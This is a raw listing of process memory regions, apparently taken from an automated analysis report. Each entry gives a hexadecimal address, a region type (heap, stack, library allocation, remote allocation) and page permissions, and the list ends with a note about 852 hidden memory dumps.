185E88C1000
heap
page read and write
13F96632000
trusted library allocation
page read and write
1435A0ED000
heap
page read and write
25D774E4000
heap
page read and write
185E93C9000
heap
page read and write
13FA6250000
trusted library allocation
page read and write
1435BEE5000
heap
page read and write
185E88D5000
heap
page read and write
1B7D732B000
heap
page read and write
1435BF59000
heap
page read and write
25D00001000
trusted library allocation
page read and write
25D00083000
trusted library allocation
page read and write
979A8FE000
stack
page read and write
141D2E93000
heap
page read and write
185E91B4000
heap
page read and write
25D0005C000
trusted library allocation
page read and write
141D2F80000
heap
page read and write
1435A0EC000
heap
page read and write
25D7950D000
heap
page read and write
141D307D000
heap
page read and write
25D791F0000
heap
page execute and read and write
1B7D74AC000
trusted library allocation
page read and write
25D00102000
trusted library allocation
page read and write
185E85C0000
heap
page read and write
1B7D7441000
trusted library allocation
page read and write
1435A379000
heap
page read and write
141D2E97000
heap
page read and write
185E8633000
heap
page read and write
185E91E6000
heap
page read and write
7FFD345A0000
trusted library allocation
page read and write
141D2F67000
heap
page read and write
185E8633000
heap
page read and write
1B7D7254000
heap
page read and write
1B7D5220000
heap
page read and write
7FFD3441C000
trusted library allocation
page execute and read and write
7FFD34460000
trusted library allocation
page execute and read and write
1B7EF870000
heap
page read and write
1B7EF540000
heap
page read and write
185E8633000
heap
page read and write
141D307C000
heap
page read and write
1435A379000
heap
page read and write
185E92AC000
heap
page read and write
185E93B9000
heap
page read and write
141D1024000
heap
page read and write
1435A0ED000
heap
page read and write
185E8805000
heap
page read and write
141D2F64000
heap
page read and write
185E9418000
heap
page read and write
185E91B0000
heap
page read and write
141D11DE000
heap
page read and write
141D2E9B000
heap
page read and write
185E9473000
heap
page read and write
1435D9D2000
heap
page read and write
13F941B0000
heap
page read and write
227D7FF000
stack
page read and write
E44FC8E000
stack
page read and write
185E92D0000
heap
page read and write
25D77480000
heap
page read and write
185E6837000
heap
page read and write
185E93C9000
heap
page read and write
185E93C3000
heap
page read and write
1435BF54000
heap
page read and write
185E67CA000
heap
page read and write
185E8877000
heap
page read and write
1435A350000
heap
page read and write
CEAFFD000
stack
page read and write
7FFD34502000
trusted library allocation
page read and write
141D2F65000
heap
page read and write
185E85C6000
heap
page read and write
141D1024000
heap
page read and write
CEABFE000
stack
page read and write
185E85CD000
heap
page read and write
1B7D6C50000
trusted library allocation
page read and write
13F9421D000
heap
page read and write
1B7D6CE0000
trusted library allocation
page read and write
185E6765000
heap
page read and write
1435BF28000
heap
page read and write
CEBE4C000
stack
page read and write
141D2ECB000
heap
page read and write
1435BEED000
heap
page read and write
25D79410000
heap
page read and write
7FFD34610000
trusted library allocation
page read and write
1435BF4E000
heap
page read and write
185E85F3000
heap
page read and write
185E8633000
heap
page read and write
1B7D52D3000
heap
page read and write
185E889F000
heap
page read and write
185E93AB000
heap
page read and write
1435C060000
heap
page read and write
141D2E8E000
heap
page read and write
CEAD7E000
stack
page read and write
7FFD34510000
trusted library allocation
page execute and read and write
1435A0CD000
heap
page read and write
185E85C2000
heap
page read and write
1435BE74000
heap
page read and write
1435BF44000
heap
page read and write
141D0EF0000
heap
page read and write
13F94370000
heap
page read and write
1435A04D000
heap
page read and write
13F94218000
heap
page read and write
13F9669B000
trusted library allocation
page read and write
2532DFE000
stack
page read and write
141D2E94000
heap
page read and write
141D2FE3000
heap
page read and write
141D49E6000
heap
page read and write
1435A0F7000
heap
page read and write
141D2ED3000
heap
page read and write
1435BF3D000
heap
page read and write
7FFD34540000
trusted library allocation
page read and write
185E87D0000
remote allocation
page read and write
141D307E000
heap
page read and write
7FFD343F0000
trusted library allocation
page read and write
25D775D8000
heap
page read and write
CEAB7E000
stack
page read and write
1435A0FC000
heap
page read and write
141D2F70000
heap
page read and write
1B7E74AD000
trusted library allocation
page read and write
1435A0E9000
heap
page read and write
141D2F64000
heap
page read and write
185E8750000
heap
page read and write
185E93F8000
heap
page read and write
1435BF19000
heap
page read and write
13F96463000
trusted library allocation
page read and write
185E8826000
heap
page read and write
185E93AD000
heap
page read and write
141D0F79000
heap
page read and write
1435BF04000
heap
page read and write
1435BEAB000
heap
page read and write
185E8633000
heap
page read and write
1435BED8000
heap
page read and write
1435A060000
heap
page read and write
141D2F48000
heap
page read and write
227D5FE000
stack
page read and write
185E8633000
heap
page read and write
141D1020000
heap
page read and write
1B7D7A53000
trusted library allocation
page read and write
227DFFB000
stack
page read and write
185E88CF000
heap
page read and write
1435A0E8000
heap
page read and write
185E88FF000
heap
page read and write
141D2F64000
heap
page read and write
1435A0FC000
heap
page read and write
141D2F45000
heap
page read and write
141D2E93000
heap
page read and write
141D2EA4000
heap
page read and write
185E88A9000
heap
page read and write
7FFD345B0000
trusted library allocation
page read and write
1435A37E000
heap
page read and write
13F941F0000
heap
page read and write
185E93B4000
heap
page read and write
185E6720000
heap
page read and write
CEB0FF000
stack
page read and write
1B7D5251000
heap
page read and write
13F9C735000
trusted library allocation
page read and write
7FFD34530000
trusted library allocation
page execute and read and write
7FFD3451A000
trusted library allocation
page read and write
E44EC7D000
stack
page read and write
7FFD34511000
trusted library allocation
page read and write
25D004FC000
trusted library allocation
page read and write
185E687D000
heap
page read and write
185E8878000
heap
page read and write
1435BE6E000
heap
page read and write
185E946A000
heap
page read and write
1435BEF9000
heap
page read and write
185E882C000
heap
page read and write
1435BE98000
heap
page read and write
25D00011000
trusted library allocation
page read and write
141D11D0000
heap
page read and write
E44F13F000
stack
page read and write
185E88FD000
heap
page read and write
141D2E88000
heap
page read and write
185E687F000
heap
page read and write
227DBFB000
stack
page read and write
1435BF40000
heap
page read and write
25D77504000
heap
page read and write
141D2EB3000
heap
page read and write
185E88FD000
heap
page read and write
25D7948A000
heap
page read and write
1B7D7872000
trusted library allocation
page read and write
185E8633000
heap
page read and write
1B7D6C60000
heap
page readonly
2F0C8FE000
stack
page read and write
7FFD34344000
trusted library allocation
page read and write
185E91D0000
heap
page read and write
141D2F64000
heap
page read and write
1435BE87000
heap
page read and write
185E88F5000
heap
page read and write
1435BEA4000
heap
page read and write
185E88FF000
heap
page read and write
1B7D6D86000
heap
page read and write
25D00241000
trusted library allocation
page read and write
7FFD34520000
trusted library allocation
page execute and read and write
13F988DB000
trusted library allocation
page read and write
1435BE7B000
heap
page read and write
CEB27F000
stack
page read and write
185E8893000
heap
page read and write
185E88D5000
heap
page read and write
185E8893000
heap
page read and write
979A5DE000
stack
page read and write
979A87F000
stack
page read and write
185E88FD000
heap
page read and write
1B7D7566000
trusted library allocation
page read and write
185E9386000
heap
page read and write
141D49E0000
heap
page read and write
141D3080000
heap
page read and write
1435BE6E000
heap
page read and write
1B7D52B6000
heap
page read and write
25D77500000
heap
page read and write
7FFD34600000
trusted library allocation
page read and write
1435BE80000
heap
page read and write
141D2F74000
heap
page read and write
25D794E4000
heap
page read and write
13F96636000
trusted library allocation
page read and write
E44F23E000
stack
page read and write
1435A05C000
heap
page read and write
7FFD34610000
trusted library allocation
page read and write
1435A03D000
heap
page read and write
13F9B0DB000
trusted library allocation
page read and write
227D8FE000
stack
page read and write
227DCFE000
stack
page read and write
185E6895000
heap
page read and write
1435BF50000
heap
page read and write
7FFD34630000
trusted library allocation
page read and write
1435BE8C000
heap
page read and write
7FFD345F0000
trusted library allocation
page read and write
7FFD34364000
trusted library allocation
page read and write
141D2F6E000
heap
page read and write
141D11DC000
heap
page read and write
E44EDFF000
stack
page read and write
13F9C73D000
trusted library allocation
page read and write
185E85DE000
heap
page read and write
1435A370000
heap
page read and write
1B7D52B0000
heap
page read and write
1435BE62000
heap
page read and write
1B7D79BC000
trusted library allocation
page read and write
13F95C90000
heap
page execute and read and write
CEB1FE000
stack
page read and write
7FFD345E0000
trusted library allocation
page read and write
1435A379000
heap
page read and write
7DF4EF1F0000
trusted library allocation
page execute and read and write
7FFD345E0000
trusted library allocation
page read and write
13F95D40000
heap
page read and write
185E860E000
heap
page read and write
25D0003D000
trusted library allocation
page read and write
1435BF01000
heap
page read and write
141D2E83000
heap
page read and write
1435C05E000
heap
page read and write
1435A37D000
heap
page read and write
141D2F64000
heap
page read and write
13F95BC0000
trusted library allocation
page read and write
185E92AB000
heap
page read and write
185E88FF000
heap
page read and write
185E8617000
heap
page read and write
14359F80000
heap
page read and write
1435BF10000
heap
page read and write
141D2F5D000
heap
page read and write
185E85E1000
heap
page read and write
1435BF44000
heap
page read and write
25D0010C000
trusted library allocation
page read and write
7FFD344F1000
trusted library allocation
page read and write
25D000FC000
trusted library allocation
page read and write
13F9BADB000
trusted library allocation
page read and write
7FFD34620000
trusted library allocation
page read and write
1B7D526B000
heap
page read and write
185E687F000
heap
page read and write
1435C05E000
heap
page read and write
1435BF47000
heap
page read and write
CEB17E000
stack
page read and write
185E88D5000
heap
page read and write
7FFD34500000
trusted library allocation
page read and write
2F0C7FE000
stack
page read and write
1B7E7441000
trusted library allocation
page read and write
7FFD34680000
trusted library allocation
page read and write
1435A057000
heap
page read and write
7FFD34560000
trusted library allocation
page read and write
141D3081000
heap
page read and write
141D2F51000
heap
page read and write
1435C104000
heap
page read and write
141D2F54000
heap
page read and write
1435BE63000
heap
page read and write
185E85DA000
heap
page read and write
1435A378000
heap
page read and write
185E946A000
heap
page read and write
141D2E89000
heap
page read and write
185E67A0000
heap
page read and write
13F99CDB000
trusted library allocation
page read and write
13F94584000
heap
page read and write
2F0C9FF000
stack
page read and write
185E6895000
heap
page read and write
141D2E82000
heap
page read and write
1B7D7210000
heap
page execute and read and write
185E88FF000
heap
page read and write
185E88D0000
heap
page read and write
1B7D79D4000
trusted library allocation
page read and write
E44EBFE000
stack
page read and write
CEBCCE000
stack
page read and write
141D101A000
heap
page read and write
141D2E93000
heap
page read and write
185E85D2000
heap
page read and write
185E85E6000
heap
page read and write
185E6895000
heap
page read and write
7FFD34522000
trusted library allocation
page read and write
1B7D7563000
trusted library allocation
page read and write
7FFD34570000
trusted library allocation
page read and write
1B7D745F000
trusted library allocation
page read and write
141D11DE000
heap
page read and write
185E948A000
heap
page read and write
7FFD344FA000
trusted library allocation
page read and write
185E8180000
heap
page read and write
185E67DC000
heap
page read and write
1B7D5485000
heap
page read and write
2F0C6FF000
stack
page read and write
185E85E1000
heap
page read and write
25D77520000
trusted library allocation
page read and write
1435A37E000
heap
page read and write
13F95C70000
trusted library allocation
page read and write
141D0F78000
heap
page read and write
E44F0BE000
stack
page read and write
1435BF44000
heap
page read and write
CEBDCD000
stack
page read and write
25D00038000
trusted library allocation
page read and write
1435A042000
heap
page read and write
185E8700000
heap
page read and write
141D2ED0000
heap
page read and write
13F95D44000
heap
page read and write
141D0F20000
heap
page read and write
14359FE4000
heap
page read and write
13F9C4DB000
trusted library allocation
page read and write
185E8633000
heap
page read and write
25D10001000
trusted library allocation
page read and write
1435A020000
heap
page read and write
141D102E000
heap
page read and write
1435BE77000
heap
page read and write
1435A0D1000
heap
page read and write
185E866B000
heap
page read and write
185E93D6000
heap
page read and write
227D105000
stack
page read and write
1435BEC0000
heap
page read and write
1435BF15000
heap
page read and write
1435BEAB000
heap
page read and write
7FFD34542000
trusted library allocation
page read and write
7FFD34640000
trusted library allocation
page read and write
1435C05C000
heap
page read and write
1435A05D000
heap
page read and write
1435BE73000
heap
page read and write
141D2F24000
heap
page read and write
141D49E5000
heap
page read and write
185E8820000
heap
page read and write
CEAF77000
stack
page read and write
13F94190000
heap
page read and write
1B7D756A000
trusted library allocation
page read and write
25D004A2000
trusted library allocation
page read and write
141D0F70000
heap
page read and write
7FFD3434D000
trusted library allocation
page execute and read and write
25D79530000
heap
page read and write
185E85C2000
heap
page read and write
7FFD34580000
trusted library allocation
page read and write
13FA7936000
trusted library allocation
page read and write
185E8893000
heap
page read and write
1435D9CC000
heap
page read and write
13F941D0000
heap
page read and write
1435BF44000
heap
page read and write
185E91D4000
heap
page read and write
185E67CB000
heap
page read and write
1435BEAB000
heap
page read and write
141D2F30000
heap
page read and write
1435D9C0000
heap
page read and write
185E88F5000
heap
page read and write
13F9709B000
trusted library allocation
page read and write
185E8870000
heap
page read and write
141D102A000
heap
page read and write
25330FE000
stack
page read and write
141D2F75000
heap
page read and write
25D77550000
heap
page read and write
1435BF44000
heap
page read and write
185E6710000
heap
page read and write
185E8893000
heap
page read and write
13F95BE0000
trusted library allocation
page read and write
CEA7DE000
stack
page read and write
1435BE6E000
heap
page read and write
1B7EF440000
heap
page read and write
25D00109000
trusted library allocation
page read and write
1B7D7305000
heap
page read and write
1B7D53F0000
heap
page read and write
141D101F000
heap
page read and write
141D2F70000
heap
page read and write
25D77540000
trusted library allocation
page read and write
185E9402000
heap
page read and write
7FFD345A0000
trusted library allocation
page read and write
185E88FD000
heap
page read and write
185E8838000
heap
page read and write
185E866B000
heap
page read and write
25D794BD000
heap
page read and write
141D2B34000
heap
page read and write
185E860B000
heap
page read and write
979A97D000
stack
page read and write
7FFD345F0000
trusted library allocation
page read and write
13F96241000
trusted library allocation
page read and write
141D0F7E000
heap
page read and write
25D003C8000
trusted library allocation
page read and write
141D0FF1000
heap
page read and write
E44EA73000
stack
page read and write
141D2EE0000
heap
page read and write
25D796D0000
heap
page read and write
13FA6241000
trusted library allocation
page read and write
CEAAFE000
stack
page read and write
25D000FF000
trusted library allocation
page read and write
185E91D5000
heap
page read and write
141D2A90000
heap
page read and write
141D0F8C000
heap
page read and write
1B7D72F8000
heap
page read and write
185E92AB000
heap
page read and write
141D0F7F000
heap
page read and write
1435BF0D000
heap
page read and write
141D2F10000
heap
page read and write
185E92AB000
heap
page read and write
141D2EBF000
heap
page read and write
185E8870000
heap
page read and write
1435BED5000
heap
page read and write
1435BE73000
heap
page read and write
1435BE68000
heap
page read and write
185E93EA000
heap
page read and write
185E8633000
heap
page read and write
185E8870000
heap
page read and write
1435BF59000
heap
page read and write
1435BE63000
heap
page read and write
25D79140000
trusted library allocation
page read and write
25D0014D000
trusted library allocation
page read and write
185E882F000
heap
page read and write
185E85CF000
heap
page read and write
1435BF60000
heap
page read and write
14359FE0000
heap
page read and write
141D0F6B000
heap
page read and write
185E85FB000
heap
page read and write
141D11D9000
heap
page read and write
13F941D6000
heap
page read and write
1435BEB0000
heap
page read and write
141D2EF8000
heap
page read and write
185E67D7000
heap
page read and write
185E85C4000
heap
page read and write
7FFD34550000
trusted library allocation
page read and write
185E88C1000
heap
page read and write
25D79200000
heap
page execute and read and write
185E8909000
heap
page read and write
1435A0C2000
heap
page read and write
185E8618000
heap
page read and write
185E8BB0000
heap
page read and write
1435BEF0000
heap
page read and write
25D79130000
heap
page readonly
13F941DE000
heap
page read and write
1B7D73D7000
heap
page execute and read and write
141D2ECB000
heap
page read and write
141D2E86000
heap
page read and write
185E946A000
heap
page read and write
25D77460000
heap
page read and write
1435DCF0000
trusted library allocation
page read and write
13FA6536000
trusted library allocation
page read and write
141D102A000
heap
page read and write
1B7D6D80000
heap
page read and write
185E67DF000
heap
page read and write
CEB079000
stack
page read and write
141D2ECB000
heap
page read and write
25D794D0000
heap
page read and write
7FFD34400000
trusted library allocation
page execute and read and write
2F0C4FE000
stack
page read and write
7FFD34480000
trusted library allocation
page execute and read and write
1435BF50000
heap
page read and write
141D0F00000
heap
page read and write
185E8603000
heap
page read and write
1B7D7825000
trusted library allocation
page read and write
185E6895000
heap
page read and write
185E85C5000
heap
page read and write
1B7EF460000
heap
page read and write
25D79417000
heap
page read and write
1435A0FC000
heap
page read and write
1B7D7230000
heap
page read and write
185E87D0000
remote allocation
page read and write
7FFD34342000
trusted library allocation
page read and write
141D2F67000
heap
page read and write
1435BF44000
heap
page read and write
7FFD34350000
trusted library allocation
page read and write
185E8633000
heap
page read and write
141D1018000
heap
page read and write
1435BF55000
heap
page read and write
1435BE62000
heap
page read and write
1435A0ED000
heap
page read and write
25D003DE000
trusted library allocation
page read and write
185E93DF000
heap
page read and write
13F992DB000
trusted library allocation
page read and write
13F94580000
heap
page read and write
25D7758D000
heap
page read and write
141D2E8C000
heap
page read and write
E44EF37000
stack
page read and write
13F9A6DB000
trusted library allocation
page read and write
CEBD4E000
stack
page read and write
185E9239000
heap
page read and write
1435BE9F000
heap
page read and write
1435C05D000
heap
page read and write
1435BF4C000
heap
page read and write
7FFD345D0000
trusted library allocation
page read and write
1435A0FC000
heap
page read and write
1435BEAB000
heap
page read and write
141D2EA7000
heap
page read and write
7FFD34370000
trusted library allocation
page read and write
141D4CE0000
trusted library allocation
page read and write
141D11DD000
heap
page read and write
1435BEB3000
heap
page read and write
7FFD34410000
trusted library allocation
page read and write
7FFD345C0000
trusted library allocation
page read and write
141D307C000
heap
page read and write
185E929A000
heap
page read and write
1435A100000
heap
page read and write
141D101F000
heap
page read and write
185E85E1000
heap
page read and write
7FFD34416000
trusted library allocation
page read and write
185E93C9000
heap
page read and write
185E8820000
heap
page read and write
185E88D5000
heap
page read and write
185E85C1000
heap
page read and write
185E883D000
heap
page read and write
25D003BC000
trusted library allocation
page read and write
141D2EAC000
heap
page read and write
13F941DC000
heap
page read and write
25329C9000
stack
page read and write
7FFD34570000
trusted library allocation
page read and write
7FFD34560000
trusted library allocation
page read and write
25D00146000
trusted library allocation
page read and write
25D003C0000
trusted library allocation
page read and write
2532CFE000
stack
page read and write
1435A375000
heap
page read and write
1B7D7430000
heap
page execute and read and write
25D77380000
heap
page read and write
141D49F5000
heap
page read and write
185E8905000
heap
page read and write
1B7D72D7000
heap
page read and write
7FFD34670000
trusted library allocation
page read and write
1B7D7B5C000
trusted library allocation
page read and write
1435BF31000
heap
page read and write
CEAA73000
stack
page read and write
7FFD34590000
trusted library allocation
page read and write
13F95BF0000
heap
page readonly
7FFD34640000
trusted library allocation
page read and write
14359F60000
heap
page read and write
185E93C9000
heap
page read and write
185E85F6000
heap
page read and write
979AAFE000
stack
page read and write
1435BF1C000
heap
page read and write
13F9662A000
trusted library allocation
page read and write
185E88FF000
heap
page read and write
1B7D6D88000
heap
page read and write
7FFD343F6000
trusted library allocation
page read and write
141D0FFD000
heap
page read and write
141D101E000
heap
page read and write
141D2ECC000
heap
page read and write
1435BEAC000
heap
page read and write
227DDFE000
stack
page read and write
141D2F19000
heap
page read and write
185E93B1000
heap
page read and write
E44F2BB000
stack
page read and write
185E8633000
heap
page read and write
979ABBF000
stack
page read and write
185E88A5000
heap
page read and write
141D11D9000
heap
page read and write
185E8908000
heap
page read and write
1B7D75A9000
trusted library allocation
page read and write
185E6740000
heap
page read and write
185E85CA000
heap
page read and write
185E92AB000
heap
page read and write
13F97EDB000
trusted library allocation
page read and write
CEACFD000
stack
page read and write
185E93AB000
heap
page read and write
1435A058000
heap
page read and write
1435BE60000
heap
page read and write
185E8633000
heap
page read and write
7FFD34343000
trusted library allocation
page execute and read and write
1435A05F000
heap
page read and write
1435A028000
heap
page read and write
141D2F21000
heap
page read and write
141D11D8000
heap
page read and write
141D2F05000
heap
page read and write
1435A0F0000
heap
page read and write
1435BF44000
heap
page read and write
185E93B1000
heap
page read and write
141D0F8E000
heap
page read and write
7FFD34600000
trusted library allocation
page read and write
13F96096000
heap
page read and write
141D2F60000
heap
page read and write
1435BE6C000
heap
page read and write
E44ED7E000
stack
page read and write
185E88F6000
heap
page read and write
185E93DC000
heap
page read and write
185E85CD000
heap
page read and write
185E8826000
heap
page read and write
227D4FE000
stack
page read and write
1B7D5248000
heap
page read and write
141D2F39000
heap
page read and write
141D2EF0000
heap
page read and write
13F96230000
heap
page read and write
979A55E000
stack
page read and write
185E88D5000
heap
page read and write
185E93D2000
heap
page read and write
185E8893000
heap
page read and write
1B7D79FB000
trusted library allocation
page read and write
185E67D7000
heap
page read and write
141D2B30000
heap
page read and write
185E93DF000
heap
page read and write
1435BE87000
heap
page read and write
25D005C2000
trusted library allocation
page read and write
185E866B000
heap
page read and write
1B7D7299000
heap
page read and write
7FFD34530000
trusted library allocation
page execute and read and write
1B7D7B6F000
trusted library allocation
page read and write
1435A0F2000
heap
page read and write
13F94560000
heap
page read and write
141D0F86000
heap
page read and write
1435A0C2000
heap
page read and write
185E88FD000
heap
page read and write
1B7D7897000
trusted library allocation
page read and write
185E87D0000
remote allocation
page read and write
141D2EA7000
heap
page read and write
141D102A000
heap
page read and write
185E93AB000
heap
page read and write
141D2E8F000
heap
page read and write
1435A042000
heap
page read and write
185E85DD000
heap
page read and write
185E85CD000
heap
page read and write
185E6760000
heap
page read and write
1435BE66000
heap
page read and write
185E6895000
heap
page read and write
141D2F0D000
heap
page read and write
141D101C000
heap
page read and write
25D79190000
heap
page read and write
141D0F58000
heap
page read and write
185E8824000
heap
page read and write
1435BEA7000
heap
page read and write
185E85E7000
heap
page read and write
185E93CB000
heap
page read and write
13F97A9B000
trusted library allocation
page read and write
7FFD34650000
trusted library allocation
page read and write
141D101A000
heap
page read and write
1435BE6F000
heap
page read and write
1435C061000
heap
page read and write
185E85EE000
heap
page read and write
185E88C1000
heap
page read and write
1B7D5289000
heap
page read and write
1B7D6C30000
trusted library allocation
page read and write
2F0C2F9000
stack
page read and write
141D2F70000
heap
page read and write
13F96697000
trusted library allocation
page read and write
185E861D000
heap
page read and write
185E93AB000
heap
page read and write
185E6812000
heap
page read and write
141D0F86000
heap
page read and write
141D2EC4000
heap
page read and write
185E8877000
heap
page read and write
185E890D000
heap
page read and write
141D0F8A000
heap
page read and write
1435BF59000
heap
page read and write
185E8920000
heap
page read and write
7FFD34363000
trusted library allocation
page execute and read and write
185E93AB000
heap
page read and write
227DAFE000
stack
page read and write
25D00105000
trusted library allocation
page read and write
14359F50000
heap
page read and write
141D2F6B000
heap
page read and write
7FFD345D0000
trusted library allocation
page read and write
CEADFE000
stack
page read and write
13F9665E000
trusted library allocation
page read and write
185E85D1000
heap
page read and write
E44F03E000
stack
page read and write
141D49EC000
heap
page read and write
1B7D7258000
heap
page read and write
There are 852 hidden memdumps, click here to show them.